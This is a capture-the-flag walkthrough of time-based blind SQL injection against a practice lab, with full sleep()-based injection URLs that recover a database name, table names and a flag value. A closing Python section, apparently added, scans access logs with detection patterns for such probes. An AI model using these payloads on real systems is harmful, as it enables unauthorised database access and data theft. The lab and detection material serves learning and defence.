
Network Information Security Attack and Defense Learning Platform, Level 7

Author: Internet

1. Determine the length of the database name
Enter
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(length((SELECT concat(database())))=5,sleep(10),0)--+
This guesses the length of the database name: sleep(10) only runs when the condition holds, and with a length of 5 the response takes a long time to arrive.
2. Guess the database name
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select concat(database())),1,1))="109",sleep(10),0)--+
Guess the database name one character at a time; the first character is m (ASCII 109).
After testing, executing
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select concat(database())),1,5)="mydbs",sleep(10),0)--+
makes the response take a long time, so the database name is mydbs.
3. Guess the table names
First table: log
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 0,1),1,3)='log',sleep(2),1)--+

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 0,1),1,1))=108,sleep(2),1)--+

Second table: motto
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 1,1),1,5)='motto',sleep(2),1)--+

Third table: user
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 2,1),1,4)='user',sleep(2),1)--+


4. Guess the column names
The motto column of the motto table
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select COLUMN_NAME from information_schema.columns where table_name=0x6D6F74746F limit 1,1 ),1,4))='user',sleep(2),1)--+

5. Guess the column contents
Executing
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select motto from motto limit 3,1 ),1,14)="key#notfound!#",sleep(2),1)--+
makes the site respond slowly, so the column content is key:notfound!
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select motto from motto limit 3,1 ),{},1))={},sleep(2),1)--+

6. Manual injection is tedious, so write a simple Python script to automate it.
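From the defender's side, every probe in this walkthrough leaves the same signature in the web server's access log: one parameter value that combines a time-delay function, a conditional, a character probe and often information_schema. The following Python is an added example, not part of the original writeup, that scans combined-format log lines for that combination; the log lines are constructed for this example and only mimic the payload shapes shown above.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined format), modelled on the
# payload shapes in this writeup; they are not real records from the lab server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2020:10:01:02 +0800] "GET /blind.php?username=admin HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2020:10:01:15 +0800] "GET /blind.php?username=admin%27%20and%20if(length((SELECT%20concat(database())))%3D5,sleep(10),0)--+ HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2020:10:01:31 +0800] "GET /blind.php?username=admin%27%20and%20if(substr((select%20TABLE_NAME%20from%20information_schema.tables%20where%20table_schema%3D0x6d79646273%20limit%200,1),1,3)%3D%27log%27,sleep(2),1)--+ HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2020:10:02:00 +0800] "GET /index.php?page=about HTTP/1.1" 200 2048
"""

# Minimal parser for the combined log format: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers characteristic of time-based blind SQL injection, matched on decoded values.
MARKERS = {
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "conditional": re.compile(r"\bif\s*\(", re.I),
    "char_probe": re.compile(r"\b(substr|substring|ascii|length)\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "comment_tail": re.compile(r"--\s*$"),  # "--+" decodes to "-- " via parse_qs
}


def analyse_request(url):
    """Return the set of marker names found in the decoded query parameters of one URL."""
    hits = set()
    # parse_qs percent-decodes values and turns '+' into a space, as the server would.
    for values in parse_qs(urlparse(url).query, keep_blank_values=True).values():
        for decoded in values:
            for name, pattern in MARKERS.items():
                if pattern.search(decoded):
                    hits.add(name)
    return hits


def scan_log(text, min_markers=2):
    """Return (ip, url, sorted markers) for lines that look like blind SQLi probes.

    A delay function alone is enough to flag; otherwise require min_markers hits so
    that a single innocent 'length(' in a value does not raise an alert on its own.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyse_request(m.group("url"))
        if "time_delay" in hits or len(hits) >= min_markers:
            findings.append((m.group("ip"), m.group("url"), sorted(hits)))
    return findings
```

A response-time column, where the log format includes one, makes the same rule stronger: a flagged request whose service time is close to the sleep() argument is the confirmation the attacker was waiting for.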

Source: https://www.cnblogs.com/ersuani/p/12558597.html